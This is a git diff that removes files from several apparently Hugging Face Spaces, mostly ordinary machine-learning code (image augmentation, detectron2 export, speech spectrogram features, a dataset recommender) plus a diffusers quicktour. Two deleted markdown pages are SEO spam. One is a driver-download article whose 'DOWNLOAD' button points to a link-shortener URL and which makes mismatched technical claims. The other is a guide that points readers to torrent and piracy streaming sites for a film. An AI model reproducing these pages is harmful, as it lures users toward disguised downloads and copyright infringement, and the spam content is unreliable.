use_segments else 0.10) - targets = targets[i] - targets[:, 1:5] = new[i] - - return im, targets - - -def copy_paste(im, labels, segments, p=0.5): - # Implement Copy-Paste augmentation https://arxiv.org/abs/2012.07177, labels as nx5 np.array(cls, xyxy) - n = len(segments) - if p and n: - h, w, c = im.shape # height, width, channels - im_new = np.zeros(im.shape, np.uint8) - for j in random.sample(range(n), k=round(p * n)): - l, s = labels[j], segments[j] - box = w - l[3], l[2], w - l[1], l[4] - ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area - if (ioa < 0.30).all(): # allow 30% obscuration of existing labels - labels = np.concatenate((labels, [[l[0], *box]]), 0) - segments.append(np.concatenate((w - s[:, 0:1], s[:, 1:2]), 1)) - cv2.drawContours(im_new, [segments[j].astype(np.int32)], -1, (255, 255, 255), cv2.FILLED) - - result = cv2.bitwise_and(src1=im, 
src2=im_new) - result = cv2.flip(result, 1) # augment segments (flip left-right) - i = result > 0 # pixels to replace - # i[:, :] = result.max(2).reshape(h, w, 1) # act over ch - im[i] = result[i] # cv2.imwrite('debug.jpg', im) # debug - - return im, labels, segments - - -def cutout(im, labels, p=0.5): - # Applies image cutout augmentation https://arxiv.org/abs/1708.04552 - if random.random() < p: - h, w = im.shape[:2] - scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction - for s in scales: - mask_h = random.randint(1, int(h * s)) # create random masks - mask_w = random.randint(1, int(w * s)) - - # box - xmin = max(0, random.randint(0, w) - mask_w // 2) - ymin = max(0, random.randint(0, h) - mask_h // 2) - xmax = min(w, xmin + mask_w) - ymax = min(h, ymin + mask_h) - - # apply random color mask - im[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)] - - # return unobscured labels - if len(labels) and s > 0.03: - box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32) - ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area - labels = labels[ioa < 0.60] # remove >60% obscured labels - - return labels - - -def mixup(im, labels, im2, labels2): - # Applies MixUp augmentation https://arxiv.org/pdf/1710.09412.pdf - r = np.random.beta(32.0, 32.0) # mixup ratio, alpha=beta=32.0 - im = (im * r + im2 * (1 - r)).astype(np.uint8) - labels = np.concatenate((labels, labels2), 0) - return im, labels - - -def box_candidates(box1, box2, wh_thr=2, ar_thr=100, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n) - # Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio - w1, h1 = box1[2] - box1[0], box1[3] - box1[1] - w2, h2 = box2[2] - box2[0], box2[3] - box2[1] - ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio - return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates diff --git a/spaces/naver/PUMP/test_multiscale_recursive.py b/spaces/naver/PUMP/test_multiscale_recursive.py deleted file mode 100644 index f7c073f12de5abc66794e099c79eefe8e0d0a388..0000000000000000000000000000000000000000 --- a/spaces/naver/PUMP/test_multiscale_recursive.py +++ /dev/null @@ -1,24 +0,0 @@ -# Copyright 2022-present NAVER Corp. -# CC BY-NC-SA 4.0 -# Available only for non-commercial use - -import test_singlescale as ss -import test_singlescale_recursive as ssr -import test_multiscale as ms - -def arg_parser(): - parser = ssr.arg_parser(ms.arg_parser()) - return parser - -class Main (ms.Main): - @staticmethod - def build_matcher(args, device): - # get a single-scale recursive matcher - matcher = ssr.Main.build_matcher(args, device) - type(matcher).demultiplex_img_trf = ms.demultiplex_img_trf # update transformer - - options = Main.get_options(args) - return Main.tune_matcher(args, ms.MultiScalePUMP(matcher, **options), device).to(device) - -if __name__ == '__main__': - Main().run_from_args(arg_parser().parse_args()) diff --git a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Intel 82801hb Ich8 High Definition Audio Driver.md b/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Intel 82801hb Ich8 High Definition Audio Driver.md deleted file mode 100644 index 591f36fe6a29532e3729bee22908231061abe08e..0000000000000000000000000000000000000000 --- a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Intel 82801hb Ich8 High Definition Audio Driver.md +++ /dev/null @@ -1,56 +0,0 @@ -
    -

    How to Download and Install Intel 82801HB ICH8 High Definition Audio Driver

    - -

    If you have a computer that uses the Intel I/O Controller Hub 8 (Intel ICH8) family of chipsets, you may need to update your audio driver to ensure optimal performance and compatibility. The Intel 82801HB ICH8 is one of the components of the Intel ICH8 family that supports high definition audio. In this article, we will show you how to download and install the latest Intel 82801HB ICH8 high definition audio driver for Windows 10 and Windows 11.

    -

    intel 82801hb ich8 high definition audio driver


    DOWNLOAD ►►►►► https://urlcod.com/2uIaNb



    - -

    What is Intel 82801HB ICH8 High Definition Audio Driver?

    - -

    The Intel 82801HB ICH8 high definition audio driver is a software component that enables the communication between the operating system and the audio hardware of your computer. It allows you to play sound through your speakers or headphones, as well as record sound through your microphone or other input devices. The driver also supports Intel Smart Sound Technology (Intel SST), which enhances the sound quality and reduces power consumption.

    - -

    Why Do You Need to Update Intel 82801HB ICH8 High Definition Audio Driver?

    - -

    Updating your audio driver can improve the stability and performance of your sound system, as well as fix any issues or bugs that may occur. Some of the benefits of updating your audio driver include:

    - -
      -
    • Enhanced sound quality and clarity
    • Better compatibility with new applications and devices
    • Improved security and reliability
    • Resolved audio problems such as no sound, distorted sound, or crackling noise
    
    - -

    How to Download and Install Intel 82801HB ICH8 High Definition Audio Driver?

    - -

    To download and install the latest Intel 82801HB ICH8 high definition audio driver for Windows 10 and Windows 11, you can follow these steps:

    - -
      -
    1. Go to the Realtek* High Definition Audio Driver for Windows® 10 64-bit ... - Intel page on the Intel website.
    2. Click on the Download button next to the file name that matches your operating system version and architecture (32-bit or 64-bit).
    3. Save the file to a convenient location on your computer.
    4. Double-click on the downloaded file to launch the installer.
    5. Follow the on-screen instructions to complete the installation process.
    6. Restart your computer for the changes to take effect.
    
    - -

    Congratulations! You have successfully downloaded and installed the latest Intel 82801HB ICH8 high definition audio driver for your computer. You can now enjoy high-quality sound on your speakers or headphones.

    - -

    How to Troubleshoot Intel 82801HB ICH8 High Definition Audio Driver Issues?

    - -

    Even after updating your audio driver, you may still encounter some problems with your sound system. Here are some common issues and how to troubleshoot them:

    -

    - -
      -
    • No sound: Check if your speakers or headphones are properly connected and powered on. Adjust the volume level and make sure it is not muted. Right-click on the speaker icon on the taskbar and select Troubleshoot sound problems. Follow the instructions to diagnose and fix the issue.
    • Distorted sound or crackling noise: Check if there is any interference or damage to your audio cable or jack. Try using a different audio device or port. Update your BIOS and chipset drivers. Disable any audio enhancements or effects that may be enabled.
    • Low sound quality or compatibility issues: Check if you have the latest version of the application or device that you are using. Adjust the audio settings and preferences according to your needs. Enable or disable Intel SST depending on the situation.
    
    - -

    If none of these solutions work, you can contact Intel customer support or visit their online forums for more assistance.
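    A quick way to confirm which audio driver is actually installed (and whether an update took effect) is to query Windows directly. The following is a minimal Python sketch that calls the built-in driverquery tool and filters for audio-related entries; the "audio" keyword filter is only an illustration and may need adjusting on your system.

    ```python
    # Minimal sketch: list installed Windows drivers and keep audio-related rows.
    # Assumes the built-in `driverquery` tool is available (Windows only); the
    # "audio" keyword filter is illustrative and may need adjusting for your system.
    import subprocess

    result = subprocess.run(
        ["driverquery", "/v", "/fo", "csv"],
        capture_output=True, text=True, check=True
    )
    audio_rows = [line for line in result.stdout.splitlines() if "audio" in line.lower()]
    print("\n".join(audio_rows) or "No audio driver entries found")
    ```
    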

    - -

    Conclusion

    - -

    The Intel 82801HB ICH8 high definition audio driver is a vital component of your computer's sound system. It allows you to enjoy high-quality sound on your speakers or headphones, as well as record sound through your microphone or other input devices. By updating your audio driver regularly, you can ensure optimal performance and compatibility of your sound system. You can also troubleshoot any issues that may arise by following the steps above.

    - -

    We hope this article has helped you learn how to download and install the latest Intel 82801HB ICH8 high definition audio driver for Windows 10 and Windows 11. If you have any questions or feedback, please feel free to leave a comment below.

    cec2833e83
    -
    -
    \ No newline at end of file diff --git a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Monsoon Full Movie 1080p Download EXCLUSIVE.md b/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Monsoon Full Movie 1080p Download EXCLUSIVE.md deleted file mode 100644 index 54b5b1c21234dc554507406275969ad6619d72e0..0000000000000000000000000000000000000000 --- a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Monsoon Full Movie 1080p Download EXCLUSIVE.md +++ /dev/null @@ -1,25 +0,0 @@ -
    -

    How to Watch Monsoon Full Movie 1080p Online for Free

    -

    Monsoon is a 2019 drama film directed by Hong Khaou and starring Henry Golding, Parker Sawyers, and David Tran. The film follows Kit, a British Vietnamese man who returns to Saigon for the first time in over 30 years, after fleeing during the Vietnam-American War. The film explores themes of identity, culture, and belonging as Kit reconnects with his roots and finds romance along the way.

    -

    Monsoon Full Movie 1080p Download


    Download –––––>>> https://urlcod.com/2uIb43



    -

    If you are interested in watching Monsoon full movie 1080p online for free, you have come to the right place. In this article, we will show you how to download Monsoon full movie 1080p from various sources and watch it on your preferred device. We will also provide some information about the film's plot, cast, and reviews.

    -

    Download Monsoon Full Movie 1080p from Torrent Sites

    -

    One of the easiest ways to watch Monsoon full movie 1080p online for free is to download it from torrent sites. Torrent sites are platforms that allow users to share files such as movies, music, games, etc. using peer-to-peer technology. You can find many torrent sites that offer Monsoon full movie 1080p in different formats and qualities.

    -

    However, before you download Monsoon full movie 1080p from torrent sites, you should be aware of the risks involved. Torrenting is illegal in many countries and can expose you to malware, viruses, and legal issues. You should always use a VPN (virtual private network) to protect your privacy and security when downloading torrents. You should also check the comments and ratings of the torrent file before downloading it to avoid fake or corrupted files.

    -

    Some of the popular torrent sites that offer Monsoon full movie 1080p are:

    -

    -
      -
    • YTS.mx: This site is known for its high-quality movies in small file sizes. You can download Monsoon full movie 1080p BluRay or WEB from this site with English subtitles.
    • Mkvking.com: This site provides various formats and qualities of movies, including BluRay, WEB-DL, HDRip, etc. You can download Monsoon full movie 1080p BluRay or WEB-DL from this site with English or Indonesian subtitles.
    • The Pirate Bay: This site is one of the oldest and most popular torrent sites in the world. You can find many torrents for Monsoon full movie 1080p on this site, but you may need to use a proxy or mirror site to access it.
    
    -

    Watch Monsoon Full Movie 1080p on Streaming Sites

    -

    Another way to watch Monsoon full movie 1080p online for free is to stream it on streaming sites. Streaming sites are platforms that allow users to watch movies, TV shows, documentaries, etc. online without downloading them. You can find many streaming sites that offer Monsoon full movie 1080p in different languages and regions.

    -

    However, before you watch Monsoon full movie 1080p on streaming sites, you should be aware of the drawbacks involved. Streaming sites may not offer the best picture or sound quality, and they often show intrusive ads or pop-ups that interrupt your viewing experience. Some also require you to sign up or register before watching the movie. Moreover, streaming sites may not be legal or safe in some countries and can expose you to malware, viruses, and legal issues. You should always use a VPN (virtual private network) to protect your privacy and security when streaming movies online.
    

    -

    Some of the popular streaming sites that offer Monsoon full movie 1080p are:

    -
      -
    • Putlocker: This site is one of the most popular streaming sites in the world. You can watch Monsoon full movie 1080p on this site without signing up or registering.
    • Fmovies: This site provides a large collection of movies and TV shows in various genres and languages. You can watch Monsoon full movie 1080p on this site with English subtitles.
    • Gomovies: This site offers fast and reliable streaming of movies and TV shows in HD quality. You can watch Monsoon full movie 1080p on this site.
    

      7b8c122e87
      -
      -
      \ No newline at end of file diff --git a/spaces/ngoctuanai/chatgptfree/Dockerfile b/spaces/ngoctuanai/chatgptfree/Dockerfile deleted file mode 100644 index 82e784ecdc596f0de49001c17f0376a3c10e97f3..0000000000000000000000000000000000000000 --- a/spaces/ngoctuanai/chatgptfree/Dockerfile +++ /dev/null @@ -1,7 +0,0 @@ -FROM node:18 -RUN git clone https://github.com/chokiproai/ChatGPT-Plugins.git -WORKDIR "ChatGPT-Plugins" -RUN npm i -RUN npm run build -EXPOSE 3000 -CMD ["npm", "run", "start"] diff --git a/spaces/nikitaPDL2023/assignment4/detectron2/detectron2/export/torchscript.py b/spaces/nikitaPDL2023/assignment4/detectron2/detectron2/export/torchscript.py deleted file mode 100644 index 24fe59bda44225324928542df3f2ef1745375dfd..0000000000000000000000000000000000000000 --- a/spaces/nikitaPDL2023/assignment4/detectron2/detectron2/export/torchscript.py +++ /dev/null @@ -1,132 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. - -import os -import torch - -from detectron2.utils.file_io import PathManager - -from .torchscript_patch import freeze_training_mode, patch_instances - -__all__ = ["scripting_with_instances", "dump_torchscript_IR"] - - -def scripting_with_instances(model, fields): - """ - Run :func:`torch.jit.script` on a model that uses the :class:`Instances` class. Since - attributes of :class:`Instances` are "dynamically" added in eager mode,it is difficult - for scripting to support it out of the box. This function is made to support scripting - a model that uses :class:`Instances`. It does the following: - - 1. Create a scriptable ``new_Instances`` class which behaves similarly to ``Instances``, - but with all attributes been "static". - The attributes need to be statically declared in the ``fields`` argument. - 2. Register ``new_Instances``, and force scripting compiler to - use it when trying to compile ``Instances``. - - After this function, the process will be reverted. User should be able to script another model - using different fields. - - Example: - Assume that ``Instances`` in the model consist of two attributes named - ``proposal_boxes`` and ``objectness_logits`` with type :class:`Boxes` and - :class:`Tensor` respectively during inference. You can call this function like: - :: - fields = {"proposal_boxes": Boxes, "objectness_logits": torch.Tensor} - torchscipt_model = scripting_with_instances(model, fields) - - Note: - It only support models in evaluation mode. - - Args: - model (nn.Module): The input model to be exported by scripting. - fields (Dict[str, type]): Attribute names and corresponding type that - ``Instances`` will use in the model. Note that all attributes used in ``Instances`` - need to be added, regardless of whether they are inputs/outputs of the model. - Data type not defined in detectron2 is not supported for now. - - Returns: - torch.jit.ScriptModule: the model in torchscript format - """ - assert ( - not model.training - ), "Currently we only support exporting models in evaluation mode to torchscript" - - with freeze_training_mode(model), patch_instances(fields): - scripted_model = torch.jit.script(model) - return scripted_model - - -# alias for old name -export_torchscript_with_instances = scripting_with_instances - - -def dump_torchscript_IR(model, dir): - """ - Dump IR of a TracedModule/ScriptModule/Function in various format (code, graph, - inlined graph). Useful for debugging. - - Args: - model (TracedModule/ScriptModule/ScriptFUnction): traced or scripted module - dir (str): output directory to dump files. 
- """ - dir = os.path.expanduser(dir) - PathManager.mkdirs(dir) - - def _get_script_mod(mod): - if isinstance(mod, torch.jit.TracedModule): - return mod._actual_script_module - return mod - - # Dump pretty-printed code: https://pytorch.org/docs/stable/jit.html#inspecting-code - with PathManager.open(os.path.join(dir, "model_ts_code.txt"), "w") as f: - - def get_code(mod): - # Try a few ways to get code using private attributes. - try: - # This contains more information than just `mod.code` - return _get_script_mod(mod)._c.code - except AttributeError: - pass - try: - return mod.code - except AttributeError: - return None - - def dump_code(prefix, mod): - code = get_code(mod) - name = prefix or "root model" - if code is None: - f.write(f"Could not found code for {name} (type={mod.original_name})\n") - f.write("\n") - else: - f.write(f"\nCode for {name}, type={mod.original_name}:\n") - f.write(code) - f.write("\n") - f.write("-" * 80) - - for name, m in mod.named_children(): - dump_code(prefix + "." + name, m) - - if isinstance(model, torch.jit.ScriptFunction): - f.write(get_code(model)) - else: - dump_code("", model) - - def _get_graph(model): - try: - # Recursively dump IR of all modules - return _get_script_mod(model)._c.dump_to_str(True, False, False) - except AttributeError: - return model.graph.str() - - with PathManager.open(os.path.join(dir, "model_ts_IR.txt"), "w") as f: - f.write(_get_graph(model)) - - # Dump IR of the entire graph (all submodules inlined) - with PathManager.open(os.path.join(dir, "model_ts_IR_inlined.txt"), "w") as f: - f.write(str(model.inlined_graph)) - - if not isinstance(model, torch.jit.ScriptFunction): - # Dump the model structure in pytorch style - with PathManager.open(os.path.join(dir, "model.txt"), "w") as f: - f.write(str(model)) diff --git a/spaces/nkasmanoff/SearchingFace/dataset_recommender.py b/spaces/nkasmanoff/SearchingFace/dataset_recommender.py deleted file mode 100644 index f7c367fb1408f10e5abfc83cdd4ab156a432c129..0000000000000000000000000000000000000000 --- a/spaces/nkasmanoff/SearchingFace/dataset_recommender.py +++ /dev/null @@ -1,48 +0,0 @@ -from langchain.chains import RetrievalQA -from vectorize_dataset import load_descriptions_data, create_db -from helpers import clean_up_tags, get_dataset_metadata, get_dataset_readme -from langchain.embeddings import HuggingFaceEmbeddings -from langchain import HuggingFaceHub -from langchain.chat_models import ChatOpenAI -from langchain.embeddings import OpenAIEmbeddings - - -class DatasetRecommender: - def __init__(self, dataset = 'nkasmanoff/huggingface-datasets' , - llm_backbone = ChatOpenAI(), - embeddings_backbone = HuggingFaceEmbeddings()): - self.dataset = dataset - self.llm_backbone = llm_backbone - self.embeddings_backbone = embeddings_backbone - self.hf_df = load_descriptions_data(dataset=self.dataset) - self.db = create_db(self.hf_df, self.embeddings_backbone) - self.datasets_url_base = "https://huggingface.co/datasets/" - # expose this index in a retriever interface - self.retriever = self.db.as_retriever(search_type="similarity", search_kwargs={"k":2}) - # create a chain to answer questions - self.qa = RetrievalQA.from_chain_type( - llm=self.llm_backbone, chain_type="stuff", retriever=self.retriever, return_source_documents=True) - - def recommend_based_on_text(self, query): - result = self.qa({"query": query}) - response_text = result['result'] - source_documents = result['source_documents'] - linked_datasets = [f"{self.datasets_url_base}{x.metadata['id']}" for x in source_documents] - 
return {'message': response_text, 'datasets': linked_datasets} - - def get_similar_datasets(self, query_url): - if self.dataset == "nkasmanoff/hf-dataset-cards": - retrieved_metadata = get_dataset_readme(query_url) - if 'README' not in retrieved_metadata: - return {'error': 'no description found for this dataset.'} - - cleaned_description = retrieved_metadata['README'] - else: - retrieved_metadata = get_dataset_metadata(query_url) - if 'description' not in retrieved_metadata: - return {'error': 'no description found for this dataset.'} - cleaned_description = retrieved_metadata['description'] + clean_up_tags(retrieved_metadata['tags']) - - similar_documents = self.db.similarity_search(cleaned_description) - similar_datasets = [f"{self.datasets_url_base}{x.metadata['id']}" for x in similar_documents if x.metadata['id'] not in query_url] - return {'datasets': similar_datasets} \ No newline at end of file diff --git a/spaces/nomic-ai/tweet_eval/README.md b/spaces/nomic-ai/tweet_eval/README.md deleted file mode 100644 index 794135cbdcad3f09bad1be1712afc4ec978160ef..0000000000000000000000000000000000000000 --- a/spaces/nomic-ai/tweet_eval/README.md +++ /dev/null @@ -1,8 +0,0 @@ ---- -title: tweet_eval -emoji: 🗺️ -colorFrom: purple -colorTo: red -sdk: static -pinned: false ---- diff --git a/spaces/nomic-ai/yahma_alpaca-cleaned/style.css b/spaces/nomic-ai/yahma_alpaca-cleaned/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/nomic-ai/yahma_alpaca-cleaned/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/nus-cs5647-team-5/Mandarin_Tone_Evaluation/speech_features/speech_features.py b/spaces/nus-cs5647-team-5/Mandarin_Tone_Evaluation/speech_features/speech_features.py deleted file mode 100644 index 32cb3d64e7f03f4f53ed0326906607ce6674f8e0..0000000000000000000000000000000000000000 --- a/spaces/nus-cs5647-team-5/Mandarin_Tone_Evaluation/speech_features/speech_features.py +++ /dev/null @@ -1,142 +0,0 @@ -import random -import numpy as np -from scipy.fftpack import fft - - -class SpeechFeatureMeta(): - ''' - 语音识别中所有声学特征提取类的基类 - ''' - - def __init__(self, framesamplerate=16000): - self.framesamplerate = framesamplerate - - def run(self, wavsignal, fs=16000): - ''' - run method - ''' - raise NotImplementedError('[5647] `run()` method is not implemented.') - - -class Spectrogram(SpeechFeatureMeta): - ''' - 语音识别内置的语谱图声学特征提取类 - ''' - - def __init__(self, framesamplerate=16000, timewindow=25, timeshift=10): - self.time_window = timewindow - self.window_length = int(framesamplerate / 1000 * self.time_window) # 计算窗长度的公式,目前全部为400固定值 - self.timeshift = timeshift - - ''' - # 保留将来用于不同采样频率 - self.x=np.linspace(0, self.window_length - 1, self.window_length, dtype = np.int64) - self.w = 0.54 - 0.46 * np.cos(2 * np.pi * (self.x) / (self.window_length - 1) ) # 汉明窗 - ''' - - self.x = np.linspace(0, 400 - 1, 400, dtype=np.int64) - self.w = 0.54 - 0.46 * np.cos(2 * np.pi * (self.x) / (400 - 1)) # 汉明窗 - super().__init__(framesamplerate) - - def run(self, wavsignal, fs=16000): - if fs != 16000: - raise ValueError( - 
'[Error] ASRT currently only supports wav audio files with a sampling rate of 16000 Hz, but this audio is ' + str( - fs) + ' Hz. ') - - # wav波形 加时间窗以及时移10ms - time_window = 25 # 单位ms - window_length = int(fs / 1000 * time_window) # 计算窗长度的公式,目前全部为400固定值 - - wav_arr = np.array(wavsignal) - # wav_length = len(wavsignal[0]) - # wav_length = wav_arr.shape[1] - - range0_end = int(len(wavsignal[0]) / fs * 1000 - time_window) // 10 + 1 # 计算循环终止的位置,也就是最终生成的窗数 - data_input = np.zeros((range0_end, window_length // 2), dtype=float) # 用于存放最终的频率特征数据 - data_line = np.zeros((1, window_length), dtype=float) - - for i in range(0, range0_end): - p_start = i * 160 - p_end = p_start + 400 - - data_line = wav_arr[0, p_start:p_end] - data_line = data_line * self.w # 加窗 - data_line = np.abs(fft(data_line)) - - data_input[i] = data_line[0: window_length // 2] # 设置为400除以2的值(即200)是取一半数据,因为是对称的 - - # print(data_input.shape) - data_input = np.log(data_input + 1) - return data_input - - -class SpecAugment(SpeechFeatureMeta): - ''' - 复现谷歌SpecAugment数据增强特征算法,基于Spectrogram语谱图基础特征 - ''' - - def __init__(self, framesamplerate=16000, timewindow=25, timeshift=10): - self.time_window = timewindow - self.window_length = int(framesamplerate / 1000 * self.time_window) # 计算窗长度的公式,目前全部为400固定值 - self.timeshift = timeshift - - ''' - # 保留将来用于不同采样频率 - self.x=np.linspace(0, self.window_length - 1, self.window_length, dtype = np.int64) - self.w = 0.54 - 0.46 * np.cos(2 * np.pi * (self.x) / (self.window_length - 1) ) # 汉明窗 - ''' - - self.x = np.linspace(0, 400 - 1, 400, dtype=np.int64) - self.w = 0.54 - 0.46 * np.cos(2 * np.pi * (self.x) / (400 - 1)) # 汉明窗 - super().__init__(framesamplerate) - - def run(self, wavsignal, fs=16000): - if fs != 16000: - raise ValueError( - '[Error] ASRT currently only supports wav audio files with a sampling rate of 16000 Hz, but this audio is ' + str( - fs) + ' Hz. 
') - - # wav波形 加时间窗以及时移10ms - time_window = 25 # 单位ms - window_length = int(fs / 1000 * time_window) # 计算窗长度的公式,目前全部为400固定值 - - wav_arr = np.array(wavsignal) - # wav_length = len(wavsignal[0]) - # wav_length = wav_arr.shape[1] - - range0_end = int(len(wavsignal[0]) / fs * 1000 - time_window) // 10 + 1 # 计算循环终止的位置,也就是最终生成的窗数 - data_input = np.zeros((range0_end, window_length // 2), dtype=float) # 用于存放最终的频率特征数据 - data_line = np.zeros((1, window_length), dtype=float) - - for i in range(0, range0_end): - p_start = i * 160 - p_end = p_start + 400 - - data_line = wav_arr[0, p_start:p_end] - data_line = data_line * self.w # 加窗 - data_line = np.abs(fft(data_line)) - - data_input[i] = data_line[0: window_length // 2] # 设置为400除以2的值(即200)是取一半数据,因为是对称的 - - # print(data_input.shape) - data_input = np.log(data_input + 1) - - # 开始对得到的特征应用SpecAugment - mode = random.randint(1, 100) - h_start = random.randint(1, data_input.shape[0]) - h_width = random.randint(1, 100) - - v_start = random.randint(1, data_input.shape[1]) - v_width = random.randint(1, 100) - - if mode <= 60: # 正常特征 60% - pass - elif 60 < mode <= 75: # 横向遮盖 15% - data_input[h_start:h_start + h_width, :] = 0 - elif 75 < mode <= 90: # 纵向遮盖 15% - data_input[:, v_start:v_start + v_width] = 0 - else: # 两种遮盖叠加 10% - data_input[h_start:h_start + h_width, :v_start:v_start + v_width] = 0 - - return data_input diff --git a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/docs/source/en/quicktour.md b/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/docs/source/en/quicktour.md deleted file mode 100644 index 3cf6851e46837f29952f9e9ac70674efb7d70b56..0000000000000000000000000000000000000000 --- a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/docs/source/en/quicktour.md +++ /dev/null @@ -1,314 +0,0 @@ - - -[[open-in-colab]] - -# Quicktour - -Diffusion models are trained to denoise random Gaussian noise step-by-step to generate a sample of interest, such as an image or audio. This has sparked a tremendous amount of interest in generative AI, and you have probably seen examples of diffusion generated images on the internet. 🧨 Diffusers is a library aimed at making diffusion models widely accessible to everyone. - -Whether you're a developer or an everyday user, this quicktour will introduce you to 🧨 Diffusers and help you get up and generating quickly! There are three main components of the library to know about: - -* The [`DiffusionPipeline`] is a high-level end-to-end class designed to rapidly generate samples from pretrained diffusion models for inference. -* Popular pretrained [model](./api/models) architectures and modules that can be used as building blocks for creating diffusion systems. -* Many different [schedulers](./api/schedulers/overview) - algorithms that control how noise is added for training, and how to generate denoised images during inference. - -The quicktour will show you how to use the [`DiffusionPipeline`] for inference, and then walk you through how to combine a model and scheduler to replicate what's happening inside the [`DiffusionPipeline`]. - - - -The quicktour is a simplified version of the introductory 🧨 Diffusers [notebook](https://colab.research.google.com/github/huggingface/notebooks/blob/main/diffusers/diffusers_intro.ipynb) to help you get started quickly. If you want to learn more about 🧨 Diffusers goal, design philosophy, and additional details about it's core API, check out the notebook! 
- - - -Before you begin, make sure you have all the necessary libraries installed: - -```py -# uncomment to install the necessary libraries in Colab -#!pip install --upgrade diffusers accelerate transformers -``` - -- [🤗 Accelerate](https://huggingface.co/docs/accelerate/index) speeds up model loading for inference and training. -- [🤗 Transformers](https://huggingface.co/docs/transformers/index) is required to run the most popular diffusion models, such as [Stable Diffusion](https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/overview). - -## DiffusionPipeline - -The [`DiffusionPipeline`] is the easiest way to use a pretrained diffusion system for inference. It is an end-to-end system containing the model and the scheduler. You can use the [`DiffusionPipeline`] out-of-the-box for many tasks. Take a look at the table below for some supported tasks, and for a complete list of supported tasks, check out the [🧨 Diffusers Summary](./api/pipelines/overview#diffusers-summary) table. - -| **Task** | **Description** | **Pipeline** -|------------------------------|--------------------------------------------------------------------------------------------------------------|-----------------| -| Unconditional Image Generation | generate an image from Gaussian noise | [unconditional_image_generation](./using-diffusers/unconditional_image_generation) | -| Text-Guided Image Generation | generate an image given a text prompt | [conditional_image_generation](./using-diffusers/conditional_image_generation) | -| Text-Guided Image-to-Image Translation | adapt an image guided by a text prompt | [img2img](./using-diffusers/img2img) | -| Text-Guided Image-Inpainting | fill the masked part of an image given the image, the mask and a text prompt | [inpaint](./using-diffusers/inpaint) | -| Text-Guided Depth-to-Image Translation | adapt parts of an image guided by a text prompt while preserving structure via depth estimation | [depth2img](./using-diffusers/depth2img) | - -Start by creating an instance of a [`DiffusionPipeline`] and specify which pipeline checkpoint you would like to download. -You can use the [`DiffusionPipeline`] for any [checkpoint](https://huggingface.co/models?library=diffusers&sort=downloads) stored on the Hugging Face Hub. -In this quicktour, you'll load the [`stable-diffusion-v1-5`](https://huggingface.co/runwayml/stable-diffusion-v1-5) checkpoint for text-to-image generation. - - - -For [Stable Diffusion](https://huggingface.co/CompVis/stable-diffusion) models, please carefully read the [license](https://huggingface.co/spaces/CompVis/stable-diffusion-license) first before running the model. 🧨 Diffusers implements a [`safety_checker`](https://github.com/huggingface/diffusers/blob/main/src/diffusers/pipelines/stable_diffusion/safety_checker.py) to prevent offensive or harmful content, but the model's improved image generation capabilities can still produce potentially harmful content. - - - -Load the model with the [`~DiffusionPipeline.from_pretrained`] method: - -```python ->>> from diffusers import DiffusionPipeline - ->>> pipeline = DiffusionPipeline.from_pretrained("runwayml/stable-diffusion-v1-5", use_safetensors=True) -``` - -The [`DiffusionPipeline`] downloads and caches all modeling, tokenization, and scheduling components. 
You'll see that the Stable Diffusion pipeline is composed of the [`UNet2DConditionModel`] and [`PNDMScheduler`] among other things: - -```py ->>> pipeline -StableDiffusionPipeline { - "_class_name": "StableDiffusionPipeline", - "_diffusers_version": "0.13.1", - ..., - "scheduler": [ - "diffusers", - "PNDMScheduler" - ], - ..., - "unet": [ - "diffusers", - "UNet2DConditionModel" - ], - "vae": [ - "diffusers", - "AutoencoderKL" - ] -} -``` - -We strongly recommend running the pipeline on a GPU because the model consists of roughly 1.4 billion parameters. -You can move the generator object to a GPU, just like you would in PyTorch: - -```python ->>> pipeline.to("cuda") -``` - -Now you can pass a text prompt to the `pipeline` to generate an image, and then access the denoised image. By default, the image output is wrapped in a [`PIL.Image`](https://pillow.readthedocs.io/en/stable/reference/Image.html?highlight=image#the-image-class) object. - -```python ->>> image = pipeline("An image of a squirrel in Picasso style").images[0] ->>> image -``` - -
      - -
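    Each call to the pipeline is stochastic, so you will get a different image every time. If you want reproducible results, you can pass a seeded `torch.Generator` to the pipeline. The snippet below is a small sketch of that pattern (the prompt and seed are arbitrary, and it assumes the pipeline was moved to `"cuda"` as above):

    ```python
    >>> import torch

    >>> generator = torch.Generator("cuda").manual_seed(0)
    >>> image = pipeline("An image of a squirrel in Picasso style", generator=generator).images[0]
    ```
    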
